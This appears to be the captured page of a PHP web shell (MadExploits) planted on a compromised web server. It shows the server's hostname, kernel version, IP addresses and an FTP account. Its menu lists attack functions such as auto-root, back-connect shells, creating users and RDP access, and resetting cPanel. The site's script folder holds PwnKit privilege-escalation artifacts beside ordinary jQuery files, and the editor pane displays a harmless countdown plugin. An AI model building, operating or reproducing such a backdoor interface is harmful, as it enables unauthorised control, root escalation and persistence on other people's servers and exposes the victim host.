Linux server.thearyasamaj.org 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
Apache
: 103.90.241.146 | : 216.73.216.213
Cant Read [ /etc/named.conf ]
5.6.40
ftpuser@mantra.thearyasamaj.org
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
thearyasamaj /
public_html /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
popbox
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
a.js
3.05
KB
-rw-r--r--
addthiswidget.js
6.67
KB
-rw-r--r--
common.js
133.68
KB
-rwxrwxrwx
common_19-01-15.js
132.19
KB
-rw-r--r--
common_19-10-15.js
133.38
KB
-rw-r--r--
conversion.js
8.91
KB
-rw-r--r--
cookies.js
2.03
KB
-rw-r--r--
countdown.js
2.33
KB
-rw-r--r--
index.php
210
B
-rw-r--r--
jquery-1.8.0.min.js
90.39
KB
-rwxrwxrwx
jquery-latest.js
246.98
KB
-rw-r--r--
jquery.accessible-news-slider....
19.84
KB
-rw-r--r--
jquery.accessible-news-slider_...
10.08
KB
-rw-r--r--
jquery.asscountdown.js
3.79
KB
-rw-r--r--
jquery.autocomplete.js
20.77
KB
-rw-r--r--
jquery.colorbox.js
25.62
KB
-rw-r--r--
jquery.colorbox_08-08-14.js
25.62
KB
-rw-r--r--
jquery.countdown.js
3.79
KB
-rw-r--r--
jquery.countdown_14-03-14.js
3.75
KB
-rw-r--r--
jquery.fancybox.js
44.81
KB
-rw-r--r--
jquery.fancybox_21-01-15.js
44.81
KB
-rw-r--r--
jquery.jplayer.min.js
54.44
KB
-rw-r--r--
jquery.js
117.81
KB
-rw-r--r--
jquery.live_time_ago_query.js
6.53
KB
-rw-r--r--
jquery.min.js
76.76
KB
-rw-r--r--
jquery.min_08-08-14.js
76.76
KB
-rw-r--r--
jquery.nivo.slider.pack.js
9.06
KB
-rw-r--r--
jquery.prettyPhoto.js
21.33
KB
-rw-r--r--
jquery.prettyPhoto_05-02-15.js
21.31
KB
-rw-r--r--
jquery.session.js
3.62
KB
-rw-r--r--
jquery.time_ago_min.js
90.62
KB
-rw-r--r--
jquery.timeago.js
4.33
KB
-rw-r--r--
jquery.uniform.js
18.89
KB
-rw-r--r--
jquery.uniform.min.js
8.08
KB
-rw-r--r--
jquery.validate.js
34.53
KB
-rw-r--r--
jquery.validate.min.js
23.95
KB
-rw-r--r--
jquery.wt-lightbox.min-.js
23.08
KB
-rw-r--r--
jquery.wt-lightbox.min-22-6-13...
9.93
KB
-rw-r--r--
jquery.wt-lightbox.min.js
25.76
KB
-rw-r--r--
jquery.wt-lightbox.min_19-03-1...
24.93
KB
-rw-r--r--
jquery.wt-lightbox.min_24-03-1...
25.73
KB
-rw-r--r--
jquery.wt-lightbox.min_new_24-...
26.5
KB
-rw-r--r--
jquery.wt-scroller.min.js
16.21
KB
-rw-r--r--
jquery_linkshwhide.js
13.13
KB
-rw-r--r--
jqueryshwhide.js
76.76
KB
-rw-r--r--
jqueryslider.js
91.44
KB
-rw-r--r--
key.js
534
B
-rw-r--r--
page.js
65.14
KB
-rw-r--r--
pramukhlib.js
20.06
KB
-rw-r--r--
preview.js
5.6
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
script.js
1.49
KB
-rw-r--r--
slidejquery-1.9.1.min.js
108.97
KB
-rw-r--r--
slidejssor.js
88.14
KB
-rw-r--r--
sliderjssor.slider.js
162.09
KB
-rw-r--r--
sliderscript.js
23.57
KB
-rw-r--r--
sliderscript_09-04-14.js
23.57
KB
-rw-r--r--
superfish.js
3.63
KB
-rw-r--r--
thickbox.js
11.33
KB
-rw-r--r--
timer.js
2.64
KB
-rwxrwxrwx
validate.js
2.03
KB
-rw-r--r--
wimpy.js
24.56
KB
-rwxrwxrwx
wowslider.js
84.33
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : jquery.countdown.js
// Generated by CoffeeScript 1.4.0 /* countdown is a simple jquery plugin for countdowns Dual licensed under the MIT (http://www.opensource.org/licenses/mit-license.php) and GPL-3.0 (http://opensource.org/licenses/GPL-3.0) licenses. @source: http://github.com/rendro/countdown/ @autor: Robert Fleischmann @version: 1.0.1 */ (function() { (function($) { $.countdown = function(el, options) { var getDateData, _this = this; this.el = el; this.$el = $(el); this.$el.data("countdown", this); this.init = function() { _this.options = $.extend({}, $.countdown.defaultOptions, options); if (_this.options.refresh) { _this.interval = setInterval(function() { return _this.render(); }, _this.options.refresh); } _this.render(); return _this; }; getDateData = function(endDate) { var dateData, diff; endDate = Date.parse($.isPlainObject(_this.options.date) ? _this.options.date : new Date(_this.options.date)); diff = (endDate - Date.parse(new Date)) / 1000; if (diff <= 0) { diff = 0; if (_this.interval) { _this.stop(); //var val = '1'; //submitval('',val); location.href="testresult"; } _this.options.onEnd.apply(_this); } dateData = { years: 0, days: 0, hours: 0, min: 0, sec: 0, millisec: 0 }; if (diff >= (365.25 * 86400)) { dateData.years = Math.floor(diff / (365.25 * 86400)); diff -= dateData.years * 365.25 * 86400; } if (diff >= 86400) { dateData.days = Math.floor(diff / 86400); diff -= dateData.days * 86400; } if (diff >= 3600) { dateData.hours = Math.floor(diff / 3600); diff -= dateData.hours * 3600; } if (diff >= 60) { dateData.min = Math.floor(diff / 60); diff -= dateData.min * 60; } dateData.sec = diff; return dateData; }; this.leadingZeros = function(num, length) { if (length == null) { length = 2; } num = String(num); while (num.length < length) { num = "0" + num; } return num; }; this.update = function(newDate) { _this.options.date = newDate; return _this; }; this.render = function() { _this.options.render.apply(_this, [getDateData(_this.options.date)]); return _this; }; this.stop = function() { if (_this.interval) { clearInterval(_this.interval); } _this.interval = null; return _this; }; this.start = function(refresh) { if (refresh == null) { refresh = _this.options.refresh || $.countdown.defaultOptions.refresh; } if (_this.interval) { clearInterval(_this.interval); } _this.render(); _this.options.refresh = refresh; _this.interval = setInterval(function() { return _this.render(); }, _this.options.refresh); return _this; }; return this.init(); }; $.countdown.defaultOptions = { date: "June 7, 2087 15:03:25", refresh: 1000, onEnd: $.noop, render: function(date) { return $(this.el).html("" + date.years + " years, " + date.days + " days, " + (this.leadingZeros(date.hours)) + " hours, " + (this.leadingZeros(date.min)) + " min and " + (this.leadingZeros(date.sec)) + " sec"); } }; $.fn.countdown = function(options) { return $.each(this, function(i, el) { var $el; $el = $(el); if (!$el.data('countdown')) { return $el.data('countdown', new $.countdown(el, options)); } }); }; return void 0; })(jQuery); }).call(this);
Close